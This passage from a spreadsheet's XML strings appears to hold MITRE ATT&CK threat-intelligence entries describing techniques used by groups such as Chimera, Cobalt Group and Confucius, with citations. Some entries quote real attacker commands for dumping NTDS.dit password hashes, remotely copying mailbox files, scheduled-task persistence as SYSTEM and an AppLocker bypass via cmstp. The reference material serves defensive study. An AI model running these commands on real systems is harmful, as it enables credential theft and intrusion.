    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114) has used [Cobalt Strike](https://attack.mitre.org/software/S0154) C2 beacons for data exfiltration.(Citation: NCC Group Chimera January 2021) </t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has exfiltrated stolen data to OneDrive accounts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114) has performed file deletion to evade detection.(Citation: Cycraft Chimera April 2020) </t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has utilized multiple commands to identify data of interest in file and directory listings.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has remotely copied tools and malware onto targeted systems.(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has copied tools between compromised hosts using SMB.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net user&lt;/code&gt; for account discovery.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has staged stolen data locally on compromised hosts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has harvested data from victim's e-mail including through execution of &lt;code&gt;wmic /node:&lt;ip&gt; process call create "cmd /c copy c:\Users\&lt;username&gt;\&lt;path&gt;\backup.pst c:\windows\temp\backup.pst" copy "i:\&lt;path&gt;\&lt;username&gt;\My Documents\&lt;filename&gt;.pst"
copy&lt;/code&gt;.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net localgroup administrators&lt;/code&gt; to identify  accounts with local administrative rights.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has renamed malware to GoogleUpdate.exe and WinRAR to jucheck.exe, RecordedTV.ms, teredo.tmp, update.exe, and msadcs1.exe.(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has gathered the SYSTEM registry and ntds.dit files from target systems.(Citation: Cycraft Chimera April 2020) [Chimera](https://attack.mitre.org/groups/G0114) specifically has used the NtdsAudit tool to dump the password hashes of domain users via &lt;code&gt;msadcs.exe "NTDS.dit" -s "SYSTEM" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv&lt;/code&gt; and used ntdsutil to copy the Active Directory database.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used direct Windows system calls by leveraging Dumpert.(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used the &lt;code&gt;get -b &lt;start ip&gt; -e &lt;end ip&gt; -p&lt;/code&gt; command for network scanning as well as a custom Python tool  packed into a Windows executable named Get.exe to scan IP ranges for HTTP.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net share&lt;/code&gt; and &lt;code&gt;net view&lt;/code&gt; to identify network shares of interest.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114) has encoded PowerShell commands.(Citation: Cycraft Chimera April 2020)	</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has dumped password hashes for use in pass the hash authentication attacks.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used the NtdsAudit utility to collect information related to accounts and passwords.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used multiple password spraying attacks against victim's remote services to obtain valid user and administrator accounts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114) has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)	</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;tasklist&lt;/code&gt; to enumerate processes.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has encapsulated [Cobalt Strike](https://attack.mitre.org/software/S0154)'s C2 protocol in DNS and HTTPS.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has queried Registry keys using &lt;code&gt;reg query \\&lt;host&gt;\HKU\&lt;SID&gt;\SOFTWARE\Microsoft\Terminal Server Client\Servers&lt;/code&gt; and &lt;code&gt;reg query \\&lt;host&gt;\HKU\&lt;SID&gt;\Software\Microsoft\Windows\CurrentVersion\Internet Settings&lt;/code&gt;.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has staged stolen data on designated servers in the target environment.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used RDP to access targeted systems.(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has harvested data from remote mailboxes including through execution of &lt;code&gt;\\&lt;hostname&gt;\c$\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook*.ost&lt;/code&gt;.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has utilized various scans and queries to find domain controllers and remote services in the target environment.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used Windows admin shares to move laterally.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used scheduled tasks to invoke Cobalt Strike including through batch script &lt;code&gt;schtasks /create /ru "SYSTEM" /tn "update" /tr "cmd /c c:\windows\temp\update.bat" /sc once /f /st&lt;/code&gt; and to maintain persistence.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used [PsExec](https://attack.mitre.org/software/S0029) to deploy beacons on compromised systems.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has collected documents from the victim's SharePoint.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used `fsutil fsinfo drives`, `systeminfo`, and `vssadmin list shadows` for system information including shadow volumes and drive information.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used [ipconfig](https://attack.mitre.org/software/S0100), [Ping](https://attack.mitre.org/software/S0097), and &lt;code&gt;tracert&lt;/code&gt; to enumerate the IP address and network environment and settings of the local host.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;netstat -ano | findstr EST&lt;/code&gt; to discover network connections.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114) has used the &lt;code&gt;quser&lt;/code&gt; command to show currently logged on users.(Citation: NCC Group Chimera January 2021) </t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;net use&lt;/code&gt; for system service discovery.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;time /t&lt;/code&gt; and &lt;code&gt;net time \\ip/hostname&lt;/code&gt; for system time discovery.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used a Windows version of the Linux &lt;code&gt;touch&lt;/code&gt; command to modify the date and time stamp on DLLs.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has obtained and used tools such as [BloodHound](https://attack.mitre.org/software/S0521), [Cobalt Strike](https://attack.mitre.org/software/S0154), [Mimikatz](https://attack.mitre.org/software/S0002), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used a valid account to maintain persistence via scheduled task.(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used HTTPS for C2 communications.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used the Windows Command Shell and batch scripts for execution on compromised hosts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used WMIC to execute remote commands.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used WinRM for lateral movement.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) has used custom tools to facilitate ARP cache poisoning.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) has been known to dump credentials using Mimikatz and Windows Credential Editor.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) has created fake LinkedIn profiles that included profile photos, details, and connections.(Citation: Dell Threat Group 2889)</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) has obtained and used open-source tools such as [PsExec](https://attack.mitre.org/software/S0029), [Windows Credential Editor](https://attack.mitre.org/software/S0005), and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used the Plink utility to create SSH tunnels.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has bypassed UAC.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used the command &lt;code&gt;cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt&lt;/code&gt; to bypass AppLocker and launch a malicious script.(Citation: Talos Cobalt Group July 2018)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has compromised legitimate web browser updates to deliver a backdoor. (Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used DNS tunneling for C2.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent malicious Word OLE compound documents to victims.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) had exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Proofpoint Cobalt June 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: RiskIQ Cobalt Jan 2018)(Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used exploits to increase their levels of rights and privileges.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) deleted the DLL dropper from the victim’s machine to cover their tracks.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016) The group's JavaScript backdoor is also capable of downloading files.(Citation: Morphisec Cobalt Gang Oct 2018)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has executed JavaScript scriptlets on the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has added persistence by registering the file name for the next stage malware under &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.(Citation: Morphisec Cobalt Gang Oct 2018)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.(Citation: Talos Cobalt Group July 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.(Citation: Talos Cobalt Group July 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4.(Citation: Talos Cobalt Group July 2018)(Citation: Morphisec Cobalt Gang Oct 2018)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used &lt;code&gt;odbcconf&lt;/code&gt; to proxy the execution of malicious DLL files.(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used powershell.exe to download and execute scripts.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)(Citation: RiskIQ Cobalt Jan 2018)(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has injected code into trusted processes.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used the Plink utility to create SSH tunnels.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used regsvr32.exe to execute scripts.(Citation: Talos Cobalt Group July 2018)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) used the Ammyy Admin tool as well as TeamViewer for remote access, including to preserve remote access if a Cobalt Strike module was lost.(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used Remote Desktop Protocol to conduct lateral movement.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has created Windows tasks to establish persistence.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine.(Citation: Morphisec Cobalt Gang Oct 2018)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)(Citation: Proofpoint Cobalt June 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent emails with URLs pointing to malicious documents.(Citation: Talos Cobalt Group July 2018)(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has obtained and used a variety of tools including [Mimikatz](https://attack.mitre.org/software/S0002), [PsExec](https://attack.mitre.org/software/S0029), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [SDelete](https://attack.mitre.org/software/S0195).(Citation: PTSecurity Cobalt Dec 2016)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.(Citation: Morphisec Cobalt Gang Oct 2018) The group has used an exploit toolkit known as Threadkit that launches .bat files.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) has created new services to establish persistence.(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has exfiltrated stolen files to its C2 server.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has exfiltrated victim data to cloud storage service accounts.(Citation: TrendMicro Confucius APT Feb 2018)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802.(Citation: Uptycs Confucius APT Jan 2021)(Citation: TrendMicro Confucius APT Feb 2018)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used a file stealer that checks the Document, Downloads, Desktop, and Picture folders for documents and images with specific extensions.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has downloaded additional files and payloads onto a compromised host following initial access.(Citation: Uptycs Confucius APT Jan 2021)(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has lured victims to execute malicious attachments included in crafted spearphishing emails related to current topics.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has lured victims into clicking on a malicious link sent through spearphishing.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Confucius](https://attack.mitre.org/groups/G0142) has used mshta.exe to execute malicious VBScript.(Citation: TrendMicro Confucius APT Feb 2018) </t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used PowerShell to execute malicious files and payloads.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has dropped malicious files into the startup folder `%AppData%\Microsoft\Windows\Start Menu\Programs\Startup` on a compromised host in order to maintain persistence.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has created scheduled tasks to maintain persistence on a compromised host.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has crafted and sent victims malicious attachments to gain initial access.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has sent malicious links to victims through email campaigns.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used a file stealer that can examine system drives, including those other than the C drive.(Citation: TrendMicro Confucius APT Aug 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used a weaponized Microsoft Word document with an embedded RTF exploit.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used VBScript to execute malicious code.(Citation: TrendMicro Confucius APT Feb 2018)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has used HTTP for C2 communications.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) has obtained cloud storage service accounts to host stolen data.(Citation: TrendMicro Confucius APT Feb 2018)</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) encrypts data with a substitute cipher prior to exfiltration.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) uses ZPP, a .NET console program, to compress files with ZIP.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) digitally signed an executable with a stolen certificate from legitimate company AI Squared.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) has used &lt;code&gt;-w hidden&lt;/code&gt; and &lt;code&gt;-windowstyle hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows. (Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) has used PowerShell Empire.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) has used the AirVPN service for operational activity.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) has used Metasploit, [Empire](https://attack.mitre.org/software/S0363), and AirVPN for post-exploitation activities.(Citation: ClearSky and Trend Micro Operation Wilted Tulip July 2017)(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) leveraged a compiled HTML file that contained a command to download and run an executable.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) collected complete contents of the 'Pictures' folder from compromised Windows systems.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) leveraged a watering hole to serve up malicious code.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) collected file listings of all default Windows directories.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) has obfuscated strings in [Bandook](https://attack.mitre.org/software/S0234) by base64 encoding, and then encrypting them.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070)'s version of [Bandook](https://attack.mitre.org/software/S0234) adds a registry key to &lt;code&gt;HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) took screenshots using their Windows malware.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) has used UPX to pack [Bandook](https://attack.mitre.org/software/S0234).(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) spearphished victims via Facebook and Whatsapp.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070)'s version of [Bandook](https://attack.mitre.org/software/S0234) communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&amp;&amp;&amp;”.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) has used macros in Word documents that would download a second stage if executed.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) used [Template Injection](https://attack.mitre.org/techniques/T1221) to launch an authentication window for users to enter their credentials.(Citation: Unit 42 Phishery Aug 2018)</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) has used &lt;code&gt;-WindowStyle Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows. (Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) leveraged PowerShell to download and execute additional scripts for execution.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
